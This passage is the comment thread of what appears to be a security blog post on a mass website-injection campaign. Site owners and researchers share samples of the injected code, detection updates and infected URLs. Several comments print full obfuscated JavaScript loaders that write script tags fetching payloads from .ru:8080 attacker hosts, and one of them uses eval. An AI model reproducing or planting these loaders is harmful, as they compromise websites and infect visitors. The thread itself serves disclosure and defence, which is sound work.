      hxxp://photobucket-com.sanspo.com.yoka-com.truelifefamily. ru:8080/118114.cn/118114.cn/google.com/allocine.fr/allabout.co.jp/

  30.

    The script has a new revision already out and being injected into sites. A sample:

     try{window.onload=function(){document.write('<div id=megaid>skysports-com.marketwatch</div>');Whglbtpkg9yawk = document.getElementById('megaid').innerHTML + '.)c^o#$$#m@(@.&&(!t&o(&&r##&&r!($#e#@!n@t!s!)-@(r(u@$^.$$&y)!!o&!u#!!r##!t!&@!o@($&p!@(&f$@i^l$m)^!@s(.())r!#(&u!)@:&!&#)D)E)&#&B)()U^&(@G&@(@/#(^c((a!m)##)$4#@@.#&^c####&o(#!m)/@^c$&a^)@m(4&#.!@)(^c($o@m!&!/(g)!!o&&#$o!g&(l&)^^e&#@.&^c#(o^&m!^$/(#m!^^c(&s$s@)l!^$.^&$c(($o#(@m)(/@!&g@#o&!!$@o$##g$@#l$e&&).#$c^#o$#!m#&)$.)(#e&&)^g)&/&'.replace(/&|#|\$|\)|\!|\(|\^|@/ig, '') ;document.write('<scr'+'ipt src=http://'+Whglbtpkg9yawk.replace(/DEBUG/g, '8080')+'></scr'+'ipt>');} }  catch(Xvp1q8pu ) {}
    <!--50e1dd63239a5e1b3900972f2e5de214--> 

    •

      I have just updated the Sophos detection for Troj/JSRedir-AK for this variant.
      These guys are morphing the code more regularly than they used to.

  31.

    [...] This post was mentioned on Twitter by Denis, Julio Canto, Masafumi Negishi, Tatsuya Daitoku, Yoshi Tachibana and others. Yoshi Tachibana said: It started showing up around the 27th… RT @ymzkei5 Ugh. RT @MasafumiNegishi: RT @unmaskparasites: New revision of the "GNU GPL" script http://bit.ly/aXWbZ6 [...]

  32.

    I had a similar problem, couldn’t find the exact code. After replacing my swfobject.js file with an updated version, this resolved the issue. Seems like it is infecting js files.

  33.

    Hi, Thank you. We didn’t know about this. We were hit three times in the last two weeks. The URL they used on our site yesterday:
    fbcdn-net.yallakora.com.google-co-in.counterbest .ru:8080/google.com/google.com/warez-bb.org/china.com/bit.ly/

  34.

    Revised yet again, most recent sample:

    try{window.onload=function(){document.write('<div id=Fuq9970c1s5ie8>drudgereport-com.chinamob</div>');Jzzicgcp586y245 = document.getElementById('Fuq9970c1s5ie8').innerHTML + 'i)^l(e@&&.$c!&#o#m)#&!.($&^w#s$j$$)-@c^!#@o$(m(@@.$!&w()!a$^$!v(&$e!(@b&)&a&@!&^n$#k$$^.@r!)(u!#^:)()O(&o!s$#&)@s^t)!#u$$))q!^u$!&o()#y$@^v&x)@^)/#&#^h@$(o&#^$m)e@!w##&a^)y(&!.!!c^o@m@)($.$$&@#c&&@n$^!/&$(h!@o$&m)^(@e#!^#w##a#!!^y@.!!$c#)@@!o$(m()^.^c#&!^n!^#/)(&(g(!o&o@#g#l((!e)^))^.$c^o!#$$m$/##(c#!#@a#$r^(&$e!#e$!&$r@b@#$u$()!i^&^l!(d$)!@e$r!^&.@(#c&(@&#o!m#!(@/))w($&o)$w&)^a^$#r$&!m&@o#)r@y(^.&^(c&)^!o($&m&@!^/(^'.replace(/\$|\(|@|\^|\)|#|\!|&/ig, '') ;document.write('<scr'+'ipt src=h'+'ttp://'+Jzzicgcp586y245.replace(/Oosstuquoyvx/ g, "8080")+'></scr'+'ipt>');} } catch(Tjkclo5m ) {}

    <!--908fc049c965bc03ac9c678ea1cd685f-->

    •

      As more of an explanatory note: the main difference between this and the previous version is the randomization of the “megaid” div id, presumably to prevent it from being used as a signature.

    •

      This must be yet another revision

      try{window.onload=function(){Iebf2d21q07z = '' + 'i)c(#i$b)!a&$-$(c$())o&)m((.@c&)!o&(@n(&s!)(t@!#a)n@!!t(@&(@c^$^#o^#n&t!a&&c!t(.!#(c(&@^o))$^m#&&.@&p@e@)^r&e#@)$z@h#(i!l!#^t((@o@n!@@^-#$^c)^(o(&m).#(b^i)$l&$(&!t$o^&!p^&.@&#&r!(u$:@))N#q#@5#(^b!(&@h$3)f&@)i#@t&$w&!1@r$#v!$/!&@$g####o($@&&o(g$l)@!e@$.@(c$$()o&m&.$@(a^u!/^##g))()o#^o#&#g$#l!^)e$$.&#c!o($@m($.!^^a!u)^!/@!t#$@o(($r(!#r&(&e#^n$t^@^$s!&$^.(@r#!@u)$#&/(a@$l$#l!(e!^g$)(r&$#)o$^&.^p()l!)^@/#$$##g#$o)@$o)$#^g(&l(e@.#!c&o&@m$#/^'.replace(/#|@|\^|\$|\!|&|\)|\(/ig, '') ;
      Jq2dz9nff1w0lm = 'appendChild';Rkn5tmljhj1c = d ocument.createElement('sc'+'ript');
      Rkn5tmljhj1c.src = 'h'+'ttp://'+Iebf2d21q07z.replace(/Nq5bh3fitw1rv/ g, "8080");Rkn5tmljhj1c.setAttribute('defer', 'def'+'er');e val('document.body.'+Jq2dz9nff1w0lm+'(Rkn5tmljhj1c)');} } catch(P052l4jn ) {}

      in this case translates to
      iciba-com.constantcontact.com.perezhilton-com.biltop .ru:8080/google.com.au/google.com.au/torrents.ru/allegro.pl/google.com/

  35.

    May I ask what happens when I click on a hyperlink in a spam message that sends me to one of these posted malware sites? Specifically, I have traced the IPs listed in the spam and it seems that the redirecting through infected PCs and hosts ends up at an online drugstore. One of them is Luxpharmacy .com

  36.

    My website also had this, the URL that I had was hxxp://picfoco-com.capitalone.com.salesforce-com.theantimatrix .ru:8080/google.com/google.com/vmn.net/netlog.com/over-blog.com

    Can somebody let me know what's the harm that this code would have done? Appreciate your response.

    Cheers
    Anand

  37.

    Looks like a possible evolution of this one. The injected code is here: http://noxwizard.pastebin.com/f6e4b85cc
    Of course it’s on two lines and not the way I have it. Ultimately what happens is that HS() gets called on line 578, which at this point is the following function: http://noxwizard.pastebin.com/f26805767

    •

      I forgot to mention that I was able to verify through the logs that the FTP credentials had been stolen.

    •

      I have been seeing a lot of this most recent variation. It is being randomized on each injection. However the injection is consistent across the account, and the structure stays similar.

  38.

    [...] over at Unmask Parasites. Blog. they also noticed this [...]

  39.

    [...] one of the main methods for infection is via compromised FTP credentials. My colleague over at the Unmask Parasites. Blog has also reported seeing large numbers of sites affected. Affected websites [...]